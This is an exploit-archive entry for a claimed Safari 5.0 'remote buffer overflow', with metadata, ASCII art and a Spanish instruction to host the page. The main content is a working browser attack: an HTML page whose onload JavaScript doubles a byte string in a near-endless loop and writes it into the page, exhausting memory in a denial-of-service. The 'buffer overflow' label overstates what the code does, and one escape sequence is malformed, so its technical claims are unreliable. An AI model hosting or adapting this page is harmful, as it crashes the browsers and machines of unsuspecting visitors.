# Title:Safari 5.0 Remote Buffer OverFlow/Pc Memory Overload # EDB-ID: () # CVE-ID: () # OSVDB-ID: () # Author: PoisonCode # Published: 2010-06-11 # Download Exploit Code # Download Vulnerable app # Title:Safari 5.0 Remote Buffer OverFlow # Software Link:http://www.apple.com/safari/download/ # Version: v5.0 # Platform:Windows # Author: PoisonCode # CVE-ID:()
_____ _____ _ _ | __ \ / ____| (_) | | |__) | (___ ___ ___ _ _ _ __ _| |_ _ _ | ___/ \___ \ / _ \/ __| | | | '__| | __| | | | | | ____) | __/ (__| |_| | | | | |_| |_| | |_| |_____/ \___|\___|\__,_|_| |_|\__|\__, | __/ | |___/
Lo Guardamos como un html y lo subimos algun host
Exploit -----------------------------------------
<body onload="javascript:bufov();"></body> <script> function bufov() { var b = '\x00\x13\xEF\x10\x00\x13\xEE\FF\x8A\x86\x00\x00'; for (a =0;a<99999999999;a++) { b+=b+'\x00\x13\xEF\x10\x00\x13\xEE\FF\x8A\x86\x00\x00'; document.write('<html><marquee><h1>'+b+b);
} } </script>
|